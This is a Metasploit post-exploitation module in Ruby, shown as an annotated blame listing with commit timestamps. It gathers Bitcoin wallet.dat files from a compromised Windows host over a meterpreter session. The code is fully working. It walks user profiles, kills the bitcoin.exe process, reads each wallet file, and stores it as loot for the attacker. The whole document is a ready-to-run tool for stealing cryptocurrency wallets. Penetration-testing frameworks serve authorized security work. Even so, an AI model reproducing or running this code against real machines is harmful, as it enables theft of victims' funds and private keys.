2011-06-21 03:26:07 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-06-21 03:26:07 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
2011-07-28 22:56:40 +00:00
|
|
|
require 'msf/core/post/windows/user_profiles'
|
2012-10-23 18:24:05 +00:00
|
|
|
require 'msf/core/auxiliary/report'
|
2011-06-21 03:26:07 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
include Msf::Auxiliary::Report
|
2011-07-28 22:56:40 +00:00
|
|
|
include Msf::Post::Windows::UserProfiles
|
2011-06-21 03:26:07 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather Bitcoin wallet.dat',
|
2011-10-17 03:49:49 +00:00
|
|
|
'Description' => %q{
|
2011-07-28 22:56:40 +00:00
|
|
|
This module downloads any Bitcoin wallet.dat files from the target system
|
|
|
|
},
|
2011-06-21 03:26:07 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2011-07-22 20:09:26 +00:00
|
|
|
'Author' => [ 'illwill <illwill[at]illmob.org>'],
|
2012-10-23 18:33:01 +00:00
|
|
|
'Platform' => [ 'win' ],
|
2011-06-21 03:26:07 +00:00
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
print_status("Checking All Users For Bitcoin Wallet...")
|
2011-07-28 22:56:40 +00:00
|
|
|
grab_user_profiles().each do |user|
|
|
|
|
next if user['AppData'] == nil
|
|
|
|
tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat"
|
|
|
|
jack_wallet(tmpath)
|
2011-06-21 03:26:07 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2011-07-28 22:56:40 +00:00
|
|
|
def jack_wallet(filename)
|
2011-06-21 03:26:07 +00:00
|
|
|
data = ""
|
2011-07-28 22:56:40 +00:00
|
|
|
found = session.fs.file.stat(filename) rescue nil
|
2011-06-21 03:26:07 +00:00
|
|
|
return if not found
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-06-21 03:26:07 +00:00
|
|
|
print_status("Wallet Found At #{filename}")
|
|
|
|
print_status(" Jackin their wallet...")
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-06-21 03:26:07 +00:00
|
|
|
kill_bitcoin
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-06-21 03:26:07 +00:00
|
|
|
begin
|
|
|
|
wallet = session.fs.file.new(filename, "rb")
|
|
|
|
until wallet.eof?
|
|
|
|
data << wallet.read
|
2011-10-23 11:56:13 +00:00
|
|
|
end
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-06-21 03:26:07 +00:00
|
|
|
store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
|
|
|
|
print_status(" Wallet Jacked.")
|
2011-10-17 03:49:49 +00:00
|
|
|
rescue ::Interrupt
|
2011-06-21 03:26:07 +00:00
|
|
|
raise $!
|
|
|
|
rescue ::Exception => e
|
2011-11-06 22:02:26 +00:00
|
|
|
print_error("Failed to download #{filename}: #{e.class} #{e}")
|
2011-06-21 03:26:07 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def kill_bitcoin
|
|
|
|
client.sys.process.get_processes().each do |x|
|
|
|
|
if x['name'].downcase == "bitcoin.exe"
|
|
|
|
print_status(" #{x['name']} Process Found...")
|
|
|
|
print_status(" Killing Process ID #{x['pid']}...")
|
|
|
|
session.sys.process.kill(x['pid']) rescue nil
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|